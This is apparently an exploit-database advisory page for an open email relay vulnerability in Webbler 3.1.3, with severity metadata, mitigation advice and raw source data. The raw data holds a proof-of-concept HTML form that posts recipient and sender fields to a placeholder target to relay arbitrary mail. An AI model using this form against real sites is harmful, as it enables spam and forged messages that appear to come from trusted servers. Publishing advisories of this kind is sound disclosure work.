Open Email Relay Vulnerability in Webbler

vendor:

Webbler

by:

Unknown

5.5

CVSS

MEDIUM

Open Email Relay

284

CWE

Product Name: Webbler

Affected Version From: 3.1.2003

Affected Version To: 3.1.2003

Patch Exists: NO

Related CWE:

CPE: a:webbler:webbler:3.1.3

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

Open Email Relay Vulnerability in Webbler

The 'webbler' software is vulnerable to an open-email-relay vulnerability. An attacker can exploit this vulnerability to use the webservers hosting the vulnerable software for sending arbitrary unsolicited bulk email. Attackers can also forge email messages that appear to originate from trusted mail servers.

Mitigation:

To mitigate this vulnerability, it is recommended to update the webbler software to the latest version available. Additionally, configuring proper email server settings and implementing email filtering can help prevent unauthorized email relaying.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/25045/info

The 'webbler' is prone to an open-email-relay vulnerability.

An attacker may leverage the issue to use webservers that are hosting the vulnerable software to send arbitrary unsolicited bulk email. Attackers may also forge email messages that originate from trusted mail servers.

This issue affects webbler 3.1.3; prior versions may also be affected. 

 <form method="post" action="http://www.target-domain.com/?lid=12506">
        <input type="hidden" name="code" value="4672577a2d323">
        <input type="hidden" name="referral_uri" value="">
        <input type="hidden" name="document_title" value="">
        <input type="text" name="recipient" value="">
        <input type="text" name="username" value="">
        <input type="text" name="useremail" value="">
        <INPUT class="sendbutton" type=submit name=sa VALUE="send page">
        </form>